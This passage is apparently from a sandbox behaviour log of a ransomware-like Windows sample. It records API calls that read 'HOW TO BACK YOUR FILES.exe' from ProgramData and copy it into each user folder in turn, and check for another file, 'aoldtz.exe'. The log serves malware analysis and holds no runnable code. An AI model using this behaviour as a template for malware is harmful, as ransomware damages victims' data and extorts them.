your files.exe"), bFailIfExists=1) returned 0 [0078.563] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.563] GetLastError () returned 0x0 [0078.563] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.564] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.564] CloseHandle (hObject=0x118) returned 1 [0078.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.564] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\NetHood\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.564] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.564] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.564] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\My Documents", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents") returned="C:\\Documents and Settings\\Default User\\My Documents" [0078.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4860 | out: hHeap=0x2b0000) returned 1 [0078.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0078.564] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\My Documents") returned 51 [0078.564] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\My Documents" | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents") returned="C:\\Documents and Settings\\Default User\\My Documents" [0078.564] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.564] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\My Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\my documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.565] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.565] GetLastError () returned 0x0 [0078.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.565] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.565] CloseHandle (hObject=0x118) returned 1 [0078.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.565] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.565] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\My Documents\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5552e3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5552e3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.566] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.566] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\My Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents\\My Videos") returned="C:\\Documents and Settings\\Default User\\My Documents\\My Videos" [0078.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0078.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0078.566] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\My Documents\\My Videos") returned 61 [0078.566] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\My Documents\\My Videos" | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents\\My Videos") returned="C:\\Documents and Settings\\Default User\\My Documents\\My Videos" [0078.566] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.566] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\My Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\my documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.567] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.567] GetLastError () returned 0x0 [0078.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.567] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.567] CloseHandle (hObject=0x118) returned 1 [0078.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.567] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.567] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\My Documents\\My Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x54118a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54118a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.567] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.568] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures") returned="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures" [0078.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0078.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0078.568] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures") returned 63 [0078.568] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures" | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures") returned="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures" [0078.568] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.568] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\my documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.568] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.569] GetLastError () returned 0x0 [0078.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.569] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.569] CloseHandle (hObject=0x118) returned 1 [0078.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.569] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.569] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\My Documents\\My Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x55508260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55508260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.569] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.569] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.569] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\My Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents\\My Music") returned="C:\\Documents and Settings\\Default User\\My Documents\\My Music" [0078.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0078.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0078.569] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\My Documents\\My Music") returned 60 [0078.570] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\My Documents\\My Music" | out: lpString1="C:\\Documents and Settings\\Default User\\My Documents\\My Music") returned="C:\\Documents and Settings\\Default User\\My Documents\\My Music" [0078.570] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.570] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\My Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\my documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.570] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.570] GetLastError () returned 0x0 [0078.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.570] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.571] CloseHandle (hObject=0x118) returned 1 [0078.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.571] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.571] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\My Documents\\My Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5557a680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5557a680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.571] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.571] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.571] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Music", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Music") returned="C:\\Documents and Settings\\Default User\\Music" [0078.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2308 | out: hHeap=0x2b0000) returned 1 [0078.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0078.571] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Music") returned 44 [0078.572] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Music" | out: lpString1="C:\\Documents and Settings\\Default User\\Music") returned="C:\\Documents and Settings\\Default User\\Music" [0078.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.572] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.572] GetLastError () returned 0x0 [0078.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.573] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.573] CloseHandle (hObject=0x118) returned 1 [0078.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.573] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5557a680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5557a680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.573] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.573] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings") returned="C:\\Documents and Settings\\Default User\\Local Settings" [0078.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0078.573] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Local Settings") returned 53 [0078.573] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings") returned="C:\\Documents and Settings\\Default User\\Local Settings" [0078.573] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.573] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.574] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.574] GetLastError () returned 0x0 [0078.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.574] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.575] CloseHandle (hObject=0x118) returned 1 [0078.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.575] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.575] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.575] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.575] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.575] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files" [0078.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0078.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0078.575] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files") returned 78 [0078.575] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files" [0078.575] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.575] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.576] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.576] GetLastError () returned 0x0 [0078.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.576] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.576] CloseHandle (hObject=0x118) returned 1 [0078.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.576] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.576] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.577] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.577] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" [0078.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f088 | out: hHeap=0x2b0000) returned 1 [0078.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0078.577] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned 90 [0078.577] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" [0078.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.577] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.578] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.578] GetLastError () returned 0x0 [0078.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.578] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.578] CloseHandle (hObject=0x118) returned 1 [0078.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.578] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.578] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.578] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.578] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.578] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low" [0078.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2920 | out: hHeap=0x2b0000) returned 1 [0078.579] HeapFree (in: hHeap=0x2b0000, 